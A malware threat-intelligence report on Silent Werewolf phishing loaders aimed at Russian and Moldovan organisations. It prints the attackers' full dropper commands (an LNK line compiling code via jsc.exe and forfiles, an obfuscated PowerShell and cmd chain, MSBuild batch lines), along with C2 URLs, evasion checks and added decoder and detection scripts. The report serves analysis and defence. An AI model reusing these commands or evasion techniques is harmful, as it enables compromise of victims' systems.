Malware or LLM? Silent Werewolf employs new loaders to attack Russian and Moldovan organizations
In March 2025, BI.ZONE Threat Intelligence uncovered two new campaigns by Silent Werewolf. The first one focused on Russian organizations exclusively while the second targeted both Moldovan and, presumably, Russian companies. The attackers employed two separate loader instances to retrieve the malicious payload from their C2 server. Unfortunately, the payload itself was not available at the time of this research. However, a retrospective analysis of similar Silent Werewolf campaigns suggests that the threat actor used XDigo malware.
Adversaries often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It is important to remember that the brands cannot be liable for the actions of criminals and associated damage.
- Phishing emails remain the adversaries’ preferred technique for targeted attacks, particularly those involving espionage.
- The threat actor hinders payload retrieval to impede further analysis.
- The extensive use of legitimate tools and malware code obfuscation allows the attackers to stay undetected for longer periods to achieve their goals.
Target countries: Russia
Target industries: energy (nuclear), aircraft, instrumentation and mechanical engineering
Start date: 2025-03-11
The adversaries distributed a previously unknown obfuscated loader coded in C#. It was disguised either as a pre-action letter addressed to the chairman of the Presidium of the Almaty City Bar Association or as documents for a residential construction project.
To deliver the malicious payload, the attackers distributed phishing emails containing a download link to a ZIP file. The archive included an LNK file and a nested ZIP. The latter encompassed a legitimate executable, a malicious DLL, and a decoy PDF.
We discovered two ZIP files, proyekt.zip and dokazatelstva.zip (fig. 1 and fig. 2).
These archives comprise the following:
- An LNK file used to extract the nested archive and trigger the next stage.
- A ZIP file disguised as a .ini configuration file, including:
  - a decoy PDF
  - the legitimate executable DeviceMetadataWizard.exe (version 10.0.17763.132), digitally signed by Microsoft Corporation
  - a malicious DLL that serves as a .NET loader
The LNK file finds the downloaded archive in the %USERPROFILE% directory. It also compiles the JScript.NET code embedded in the LNK to unpack the contents of the nested ZIP into a designated directory. It then runs the extracted legitimate executable, which in turn loads the malicious DLL (the C# loader).
Here is a command example from доказательства_0007093.lnk:
```
cmd.exe /c "set PATH=%windir%\system32;%PATH% & (for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (chcp 65001 | echo | set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a & for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" & for /L %i in (1,1,3) do @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) else (@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") else (@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")))) ))"
```
This command triggers the following sequence:
- `cmd.exe /c "set PATH=%windir%\system32;%PATH%` adds the path to the system32 directory to the PATH environment variable, enabling access to system programs.
- `for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (...)` runs a recursive search for dokazatelstva.zip in the %USERPROFILE% directory. If the file is found, the @IF EXIST block is executed, where:
  - `chcp 65001` sets the console encoding to UTF-8.
  - `echo | set /p="<JScript.NET code>" >%TEMP%\UKSS1G4Q7H6S.a` creates a file containing the JScript.NET code.
  - `for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j"` searches for the JScript.NET compiler executable (jsc.exe).
  - `for /L %i in (1,1,3) do` runs the following loop three times:
    - `@if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit)` checks for the legitimate executable. If found, runs it. If not, goes to the next condition.
    - `@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7")` checks for unzip.exe. If found, runs it with the parameters %f (the path to dokazatelstva.zip) and "%USERPROFILE%\J8ZUARAW71W7". If not, goes to the next condition.
    - `@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a"))` checks for unzip.exe_ and unzip.exe. If neither exists, compiles %TEMP%\UKSS1G4Q7H6S.a into %TEMP%\unzip.exe with the jsc.exe compiler. The compilation is invoked through forfiles.exe.
The unzip.exe file extracts the contents of the original ZIP into the designated directory, unpacks the nested ZIP, and renames itself to unzip.exe_ (fig. 3).
Fig. 3. unzip.exe
The C# loader is a d3d9.dll library that is accessed via the H5GDXM70NJ.exe legitimate executable (DeviceMetadataWizard.exe) through DLL side-loading. The loader retrieves the malicious payload from the C2 server, saves it to the host’s startup folder, and opens the decoy PDF.
The loader code is obfuscated, its strings encoded with Base64 and encrypted with XOR using a UTF‑8 string key (fig. 4). Each loader instance employs a unique XOR key.
The C# loader has the following capabilities:
- Checks startup arguments.
- If run with the /startup argument, executes the downloaded malicious payload %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
- If run without arguments, copies the test.cfg decoy to %USERPROFILE%\Documents\dokazatelstva.pdf and opens it via the explorer command (explorer %USERPROFILE%\Documents\dokazatelstva.pdf).
- Creates an asynchronous task to download the malicious payload from the URL indicated in the loader configuration data (e.g., hxxps://pdf-bazaar[.]com/files2025/?pti=npu&yay=3oKPkD33tx5Tuzz). When calling the server, uses the following User-Agent header string: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36”. The server response is decoded with Base64 and decrypted with the XOR key used for the encrypted strings. The contents are decoded again using Base64, then the loader creates the %APPDATA%\74EJ6RTFKKRS working directory and writes the final payload to %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
- Within the same asynchronous task, spawns a separate thread and calls a function that copies H5GDXM70NJ.exe and d3d9.dll to the %APPDATA%\74EJ6RTFKKRS directory. Then, to gain persistence, creates the startapp.bat batch script in the startup folder. This script executes %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe with the /startup argument.
- Within the same asynchronous task, spawns a separate thread and calls a function that executes the downloaded malicious payload %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
The adversaries appear to run checks on target systems. If a target host does not meet certain criteria, the Llama 2 large language model (LLM) in GGUF format is downloaded from hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf (fig. 5). This hinders comprehensive analysis of the entire attack and allows the threat actor to bypass defenses such as sandboxes.
Fig. 5. llama-2-70b.Q5_K_M.gguf from the C2 server instead of the malicious payload
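The decoding chain the loader applies to the C2 response (Base64, then XOR with the UTF-8 string key, then Base64 again) and to its own strings (Base64, then XOR), together with a check for the GGUF fallback described above, as an added Python example. This is not code recovered from the loader: the key, the stub PE bytes and the GGUF header are constructed test inputs, and classifying the result by file magic is this example's own addition.

```python
import base64

GGUF_MAGIC = b"GGUF"  # first four bytes of a GGUF model file
PE_MAGIC = b"MZ"      # DOS header that every Windows PE file starts with


def xor_with_key(data: bytes, key: str) -> bytes:
    """XOR data with the UTF-8 bytes of a string key, cycling the key as needed."""
    kb = key.encode("utf-8")
    return bytes(b ^ kb[i % len(kb)] for i, b in enumerate(data))


def decode_loader_string(encoded: str, key: str) -> str:
    """Recover one obfuscated loader string: Base64-decode, then XOR with the key."""
    return xor_with_key(base64.b64decode(encoded), key).decode("utf-8")


def decode_loader_response(body: bytes, key: str) -> tuple[str, bytes]:
    """Classify a C2 response and return (kind, data).

    kind is "gguf_decoy" when the server handed back a GGUF model file instead
    of a payload, "pe_payload" when the Base64/XOR/Base64 chain yields a PE
    file, "undecodable" when the chain fails (wrong key or non-Base64 body),
    and "unknown" for anything else.
    """
    if body.startswith(GGUF_MAGIC):
        return "gguf_decoy", body
    try:
        inner = xor_with_key(base64.b64decode(body, validate=True), key)
        payload = base64.b64decode(inner, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "undecodable", body
    if payload.startswith(PE_MAGIC):
        return "pe_payload", payload
    return "unknown", payload


def build_sample_response(payload: bytes, key: str) -> bytes:
    """Inverse of the decoding chain; used only to construct test input here."""
    return base64.b64encode(xor_with_key(base64.b64encode(payload), key))


# Constructed inputs, not real samples: a multibyte key to exercise key
# cycling, a 68-byte PE-looking stub (e_lfanew at 0x3c points at "PE\0\0"),
# and the start of a GGUF file (magic plus version 3).
SAMPLE_KEY = "constructed-key-ключ"
SAMPLE_PE = b"MZ\x90\x00" + b"\x00" * 56 + b"\x40\x00\x00\x00" + b"PE\x00\x00"
SAMPLE_RESPONSE = build_sample_response(SAMPLE_PE, SAMPLE_KEY)
SAMPLE_GGUF = GGUF_MAGIC + (3).to_bytes(4, "little") + b"\x00" * 16
ENCODED_STARTUP_ARG = base64.b64encode(xor_with_key(b"/startup", SAMPLE_KEY)).decode()

if __name__ == "__main__":
    print(decode_loader_response(SAMPLE_RESPONSE, SAMPLE_KEY)[0])  # pe_payload
    print(decode_loader_response(SAMPLE_GGUF, SAMPLE_KEY)[0])      # gguf_decoy
    print(decode_loader_string(ENCODED_STARTUP_ARG, SAMPLE_KEY))   # /startup
```

A captured response that decodes to neither magic is worth keeping for comparison against later samples rather than being discarded as noise.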
Decoy examples are shown in fig. 6 and fig. 7.
Fig. 6. test.cfg (dokazatelstva.pdf)
Fig. 7. test.cfg (proyekt.pdf)
Target countries: Moldova, Russia (presumably)
Target industries: n/a
Start date: 2025-03-18
A new version of the C# loader was disguised as an official vacation schedule and recommendations for protecting corporate information infrastructure against ransomware attacks. This time, Silent Werewolf focused on Moldovan and Russian organizations.
As in the previous campaign, the adversaries seemed to leverage phishing to distribute malicious emails containing a download link to a ZIP archive.
We discovered two ZIP files, Grafik_SL_0525.zip and Rekomendatsii_032025.pdf.zip.
These archives comprise the following:
- Grafik_SL_0525.lnk / Rekomendatsii_032025.pdf.lnk, a malicious LNK file that includes a command to extract a nested ZIP and trigger the next stage.
- config.bin, a file that includes CMD shell commands, an MSBuild task project, the task’s original C# source code, and an encrypted and encoded payload. The latter contains a decoy PDF, two legitimate DLLs (Microsoft.Build.Framework.dll and Microsoft.Build.Utilities.Core.dll), and a malicious DLL that serves as the C# loader.
- aini.dat, a file that includes random data not used by the malware.
The LNK file invokes the forfiles.exe utility to recursively search the %USERPROFILE% directory for a ZIP file matching the *[archive_name] mask (e.g., *Grafik_SL_0525.zip). The contents of each archive found are extracted to the %TEMP% folder using PowerShell. The config.bin is then read and commands are executed string by string in cmd.exe in silent mode (the /q flag).
Obfuscated LNK command:
```
forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;type ($env:TMP + '\config.bin') |c0x6d0x64.e0x780x65 /q|out-null"
```
Deobfuscated LNK command:
```
forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "powershell.exe -c Expand-Archive -F '[path to the Grafik_SL_0525.zip archive]' %TEMP%|out-null;type ($env:TMP + '\config.bin') |cmd.exe /q|out-null"
```
The config.bin file includes the following batch commands executed string by string:
```
mkdir %USERPROFILE%\Searches\winrt-{[GUID]}\
copy /Y %TEMP%\config.bin %USERPROFILE%\Searches\winrt-{[GUID]}\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe %USERPROFILE%\Searches\winrt-{[GUID]}\config.bin >nul 2>&1
exit
```
Example of a newly created directory: %USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}.
As a result, a working directory is created at %USERPROFILE%\Searches\winrt-{[GUID]}. The config.bin file is copied here and then MSBuild is invoked to compile and execute a Build task (fig. 8).
Compiling and executing an MSBuild task:
```
MSBuild.exe C:\Users\[USERNAME]\Searches\winrt-{[GUID]}\config.bin
  [...]exe /noconfig /fullpaths @"%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].cmdline"
  [...]exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%Temp%\[TEMP_FILENAME].tmp" "%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].TMP"
```
Fig. 8. config.bin
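The command-line patterns of both LNK chains above (forfiles.exe proxying an interpreter, hex-escaped powershell/cmd.exe names, Expand-Archive on the matched file, config.bin piped into cmd.exe /q, jsc.exe compiling into %TEMP%, and MSBuild.exe handed a non-project file) turned into triage logic over process-creation telemetry. This is an added Python example written for this page, not BI.ZONE detection content; the indicator names, the weights and the benign sample lines are constructed, while sample lines 0 to 2 are the command lines quoted in the report.

```python
import re

# Inline hex escapes such as "po0x77e0x720x73he0x6cl" hide interpreter names
# from naive string matching; decoding them restores "powershell".
HEX_TOKEN = re.compile(r"0x([0-9a-fA-F]{2})")

# Indicator weights: forfiles and Expand-Archive are common in admin scripts
# on their own, so they score low; the others rarely appear in benign use.
WEIGHTS = {
    "forfiles_proxy_execution": 1,
    "expand_archive_of_matched_file": 1,
    "piped_commands_into_cmd_quiet": 2,
    "jsc_compile_to_temp": 3,
    "msbuild_non_project_input": 3,
    "hex_obfuscated_interpreter": 3,
}

def deobfuscate_hex_tokens(cmdline: str) -> str:
    """Replace every inline 0xNN escape with the character it encodes."""
    return HEX_TOKEN.sub(lambda m: chr(int(m.group(1), 16)), cmdline)

def lnk_chain_indicators(cmdline: str) -> list[str]:
    """List the behavioural indicators from the two LNK chains found in one command line."""
    cmd = deobfuscate_hex_tokens(cmdline)
    low = cmd.lower()
    hits = []
    if "forfiles" in low and re.search(r'/c\s+"?(powershell|cmd)', low):
        hits.append("forfiles_proxy_execution")        # forfiles /c launching an interpreter
    if "expand-archive" in low and "@path" in low:
        hits.append("expand_archive_of_matched_file")  # unpacking the file forfiles matched
    if re.search(r"\|\s*cmd(\.exe)?\s+/q", low):
        hits.append("piped_commands_into_cmd_quiet")   # config.bin contents fed to cmd.exe /q
    if ("jsc.exe" in low or "%_jsc%" in low) and "/out:%temp%" in low:
        hits.append("jsc_compile_to_temp")             # JScript.NET compiled into %TEMP%
    m = re.search(r"msbuild(?:\.exe)?\s+(\S+)", low)
    if m and not m.group(1).endswith((".proj", ".csproj", ".vbproj", ".sln", ".targets")):
        hits.append("msbuild_non_project_input")       # MSBuild given config.bin, not a project
    if cmd != cmdline and ("powershell" in low or "cmd.exe" in low):
        hits.append("hex_obfuscated_interpreter")      # interpreter name was hex-escaped
    return hits

def flag_suspicious(cmdlines, threshold: int = 3):
    """Return (index, score, indicators) for every line scoring at or above threshold."""
    scored = ((i, sum(WEIGHTS[h] for h in hits), hits)
              for i, hits in enumerate(map(lnk_chain_indicators, cmdlines)))
    return [entry for entry in scored if entry[1] >= threshold]

# Constructed process-creation telemetry: lines 0-2 are the command lines
# quoted in the report (line 1 is the forfiles fragment of the JScript.NET
# chain); lines 3-5 are benign look-alikes that should stay below threshold.
SAMPLE_CMDLINES = [
    r'''forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;type ($env:TMP + '\config.bin') |c0x6d0x64.e0x780x65 /q|out-null"''',
    r'''forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a"''',
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe %USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\config.bin >nul 2>&1",
    r'forfiles /p C:\Logs /s /m *.log /d -30 /c "cmd /c del @path"',
    r"MSBuild.exe MyApp.csproj /p:Configuration=Release",
    r"powershell.exe -c Expand-Archive -Path report.zip -DestinationPath .",
]
```

The benign forfiles cleanup line still earns one weak indicator, which is the point of weighting: a single low-scoring hit is triage context, not an alert.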
The Build task initiates two subtasks: TaskCreator and a randomly named task matching [A-Za-z0-9]{10,14} (e.g., B0xy2l4pee34x9).
TaskCreator reads encrypted and encoded files embedded in config.bin, decrypts, decodes, and reconstructs these files, and opens a decoy PDF (%TEMP%\(Grafik_SL_0525.pdf|Rekomendatsii_032025.pdf)). The files embedded in config.bin are encrypted using a Caesar (shift) cipher and encoded using Base64 (fig. 9). The TaskCreator code serves as a dropper.
Fig. 9. config.bin
Decrypted and decoded files comprise:
- Grafik_SL_0525.pdf / Rekomendatsii_032025.pdf, a decoy PDF.
- [TASK_NAME].tmp, a malicious DLL that serves as the C# loader. The DLL name is indicated in config.bin and varies from case to case (e.g., B0xy2l4pee34x9.tmp).
- Microsoft.Build.Framework.dll, a legitimate file.
- Microsoft.Build.Utilities.Core.dll, a legitimate file.
The C# loader runs with the following Base64-encoded parameters (fig. 10):
- Path to the working directory.
- XOR key to decrypt the malicious payload.
- URL for downloading the malicious payload.
- User-Agent header string.
- Name for the downloaded file.
- Parameter to check certain conditions within the program.
Fig. 10. B0xy2l4pee34x9 task in config.bin
One of the loader runs, for example, uses the following decoded parameters: “%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\”, “BSX4neaFa5zahRcCcSxGudPU8GprbySA”, “hxxps://myupload[.]net/pismo/Grafik_SL_0525/?xwre=VbU5NQSLczxyvEDVzIDZR6Z3Hwp48u1m”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36”, “MemoryDataProcess.exe”, “ea”.
A randomly named task (B0xy2l4pee34x9) invokes the C# loader in the form of a DLL, with its code obfuscated using Obfuscar. Before executing its core code, the loader checks the startup conditions: the decoded XOR key (parameter 2) must contain a substring (parameter 6) at a specific offset, the username must not be “JohnDoe”, the machine name must not be “HAL9TH”, and the NUMBER_OF_PROCESSORS variable must not be null. If any of these conditions is not met, the loader terminates (fig. 11).
The loader decodes Base64-encoded strings received as parameters. It then creates and deletes from 100 to 200 random files within the working directory %USERPROFILE%\Searches\winrt-{[GUID]}\[RANDOM_NAME]. Afterward, it downloads an XOR-encrypted malicious payload from the specified URL (hxxps[://]myupload[.]net/pismo/Grafik_SL_0525/?xwre=BrNCqgeaXXo94U18qUGqii5PpjGTk2va), saves it to the working directory (%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\MemoryDataProcess.exe), decrypts and executes it. The payload is a PE file.
Decoy examples are shown in fig. 12 and fig. 13.
Fig. 12. Grafik_SL_0525.pdf
Fig. 13. Rekomendatsii_032025.pdf
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access | Phishing: Spearphishing Link | Silent Werewolf uses links in phishing emails to load malware |
| Execution | Command and Scripting Interpreter: PowerShell | Silent Werewolf uses a malicious LNK file to execute PowerShell commands |
| | Command and Scripting Interpreter: Windows Command Shell | Silent Werewolf uses a malicious LNK file to execute Windows command shell commands |
| | User Execution: Malicious Link | Silent Werewolf tricks a user into clicking a link that downloads a ZIP archive containing malicious files |
| | User Execution: Malicious File | The victim must execute a malicious LNK file to initiate the system compromise |
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Silent Werewolf uses a C# loader to create the startapp.bat batch script in the startup folder |
| Defense Evasion | Deobfuscate/Decode Files or Information | Silent Werewolf uses TaskCreator from config.bin to decrypt and decode the embedded files. Silent Werewolf uses a C# loader with Base64‑decoded and XOR-decrypted strings |
| | Hijack Execution Flow: DLL | Silent Werewolf leverages DLL side-loading to access a malicious C# loader DLL through the legitimate executable |
| | Indicator Removal: File Deletion | Silent Werewolf uses a C# loader that creates and deletes from 100 to 200 random files within the malware’s working directory |
| | Indirect Command Execution | Silent Werewolf employs forfiles.exe to execute commands |
| | Masquerading: Rename Legitimate Utilities | Silent Werewolf disguises a C# loader as a DirectX 9.0 library (d3d9.dll) |
| | Masquerading: Double File Extension | Silent Werewolf uses the double extension .pdf.lnk (e.g., Rekomendatsii_032025.pdf.lnk) |
| | Obfuscated Files or Information: Compile After Delivery | Silent Werewolf uses the jsc.exe compiler and MSBuild to compile code on the target host |
| | Obfuscated Files or Information | Silent Werewolf uses Obfuscar to obfuscate a C# loader. Silent Werewolf leverages Base64 and XOR to encrypt strings in a C# loader |
| | Obfuscated Files or Information: Embedded Payloads | Silent Werewolf uses config.bin to carry an encrypted and encoded payload |
| | Obfuscated Files or Information: Command Obfuscation | Silent Werewolf uses obfuscated commands in malicious LNK files |
| | Obfuscated Files or Information: Encrypted/Encoded File | Silent Werewolf leverages Base64 and XOR (in some cases, XOR alone) to decode and decrypt the final payload executable downloaded from the C2 server |
| | Trusted Developer Utilities Proxy Execution: MSBuild | Silent Werewolf uses MSBuild.exe to compile and execute a malicious Build task from config.bin |
| | Virtualization / Sandbox Evasion: System Checks | Silent Werewolf leverages loader-embedded checks (e.g., for username, computer name, and number of processors) |
| Command and Control | Application Layer Protocol: Web Protocols | Silent Werewolf uses HTTPS to download an encrypted payload file from the C2 server |
| | Ingress Tool Transfer | Silent Werewolf employs custom C# loaders to download the malicious payload from the C2 server |
Phishing is one of the most popular attack vectors against organizations. You can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect your email communications. The solution carefully examines every incoming message to identify and block illegitimate content. BI.ZONE Mail Security uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This kind of inspection does not slow down the delivery of legitimate emails.
Attacks similar to those by Silent Werewolf are not only critical to detect but also to neutralize before they affect the infrastructure. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices, for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.